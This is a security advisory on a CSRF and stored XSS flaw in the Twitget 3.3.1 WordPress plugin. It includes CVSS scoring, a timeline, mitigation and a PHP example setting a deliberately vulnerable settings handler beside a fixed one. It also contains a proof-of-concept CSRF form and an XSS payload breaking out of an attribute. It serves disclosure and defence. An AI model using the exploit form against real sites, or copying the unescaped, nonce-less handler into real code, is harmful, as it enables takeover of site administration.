Advisory:

CSRF/XSS vulnerability in Twitget 3.3.1

Vulnerability


If a logged-in administrator visits a specially crafted page, that page can submit a form to the plugin's settings screen and the plugin saves the posted options without checking that the administrator intended the change (CSRF), because the request is accepted with no nonce check. Some of those options are then written back into the settings form without escaping (XSS), so a value such as `"><script>alert('dxw')</script>` breaks out of the input's value attribute and runs as script whenever the settings page is viewed. In this example the XSS occurs at line 755 in twitget.php. The nonce check should have occurred somewhere around line 661 in the same file.
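The following is an added illustration of the pattern the advisory describes and of the WordPress-API fix; it is not Twitget's own code. The function names twitget_settings_page_vulnerable() and twitget_settings_page_fixed(), the option name 'twitget_options' and the nonce action/field names are assumptions made for this example; only the POST field names are taken from the proof of concept below.

```php
<?php
/*
 * Added example, not the plugin's code. Shows the unsafe handler next to
 * the hardened one. Names other than the POST fields are assumptions.
 */

/* --- Vulnerable pattern (what the advisory describes) --- */
function twitget_settings_page_vulnerable() {
    // CSRF: the POST is trusted as soon as it arrives. A form on any site the
    // administrator visits can submit it, because the browser attaches the
    // admin's WordPress cookies to the cross-site request.
    if ( isset( $_POST['twitget_username'] ) ) {
        update_option( 'twitget_options', array(
            'username'     => $_POST['twitget_username'],
            'consumer_key' => $_POST['twitget_consumer_key'],
        ) );
    }
    $opts = get_option( 'twitget_options', array( 'username' => '', 'consumer_key' => '' ) );
    ?>
    <form method="post">
      <!-- XSS: the stored value is written straight into the attribute.
           A consumer key of "><script>alert('dxw')</script> closes the
           attribute and the tag, and the script runs on every later visit. -->
      <input type="text" name="twitget_username" value="<?php echo $opts['username']; ?>">
      <input type="text" name="twitget_consumer_key" value="<?php echo $opts['consumer_key']; ?>">
      <input type="submit" value="Save">
    </form>
    <?php
}

/* --- Hardened version --- */
function twitget_settings_page_fixed() {
    // Capability check: a nonce is not a substitute for authorisation.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    if ( isset( $_POST['twitget_username'] ) ) {
        // CSRF fix: the nonce ties the request to a form WordPress rendered
        // for this user, which a cross-site form cannot know.
        // check_admin_referer() also verifies the Referer and dies on failure.
        check_admin_referer( 'twitget_save_options', 'twitget_nonce' );
        update_option( 'twitget_options', array(
            'username'     => sanitize_text_field( wp_unslash( $_POST['twitget_username'] ) ),
            'consumer_key' => sanitize_text_field( wp_unslash( $_POST['twitget_consumer_key'] ) ),
        ) );
    }
    $opts = get_option( 'twitget_options', array( 'username' => '', 'consumer_key' => '' ) );
    ?>
    <form method="post">
      <?php wp_nonce_field( 'twitget_save_options', 'twitget_nonce' ); ?>
      <!-- XSS fix: esc_attr() encodes quotes and angle brackets, so the
           payload is shown as text instead of breaking out of the attribute. -->
      <input type="text" name="twitget_username" value="<?php echo esc_attr( $opts['username'] ); ?>">
      <input type="text" name="twitget_consumer_key" value="<?php echo esc_attr( $opts['consumer_key'] ); ?>">
      <input type="submit" value="Save">
    </form>
    <?php
}
```

Input sanitisation on save and output escaping on display are separate defences: sanitize_text_field() happens to strip tags here, but the bug the advisory describes is fixed by esc_attr() at the point of output, which also protects values that reached the database before the fix. A plugin that registers its options with register_setting() and emits settings_fields() in the form gets the nonce generation and verification from WordPress's options.php instead of hand-rolling it.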

Current state: Fixed

CVSS Summary

CVSS v2 base score for this vulnerability:

  Score: 6.4 (Medium)
  Access Vector: Network
  Access Complexity: Low
  Authentication: None
  Confidentiality Impact: Partial
  Integrity Impact: Partial
  Availability Impact: None
  Vector string: AV:N/AC:L/Au:N/C:P/I:P/A:N

"Authentication: None" refers to the attacker, who needs no account on the target site; the attack still requires a logged-in administrator to visit the attacker's page, which CVSS v2 has no user-interaction metric to express.
You can read more about CVSS base scores on Wikipedia or in the CVSS specification.

Proof of concept

<!-- Hosted on a page the attacker controls. The action URL is the target
     site's plugin settings page (a local test install here); the victim's
     browser sends their WordPress session cookies with the POST. -->
<form action="http://localhost/wp-admin/options-general.php?page=twitget/twitget.php" method="POST">
  <input type="text" name="twitget_username" value="john_smith">
  <!-- Entity-encoded here so it survives HTML parsing; the value actually
       submitted is "><script>alert('dxw')</script>, which closes the value
       attribute and input tag when the plugin echoes it back unescaped. -->
  <input type="text" name="twitget_consumer_key" value="&quot;>&lt;script>alert('dxw')&lt;/script>">
  <input type="submit">
</form>

If the administrator submits this form while logged in, the options are overwritten and the alert fires on each subsequent load of the plugin's settings page.

Advisory timeline

  • 2013-07-30: Discovered
  • 2014-03-18: Reported to plugins@wordpress.org
  • 2014-04-09: Author reports fixed in version 3.3.3.

Mitigation/further actions

Upgrade to version 3.3.3 or later. If the site ran a vulnerable version, also inspect the plugin's stored options for injected markup, since upgrading is not guaranteed to clean values that were already saved.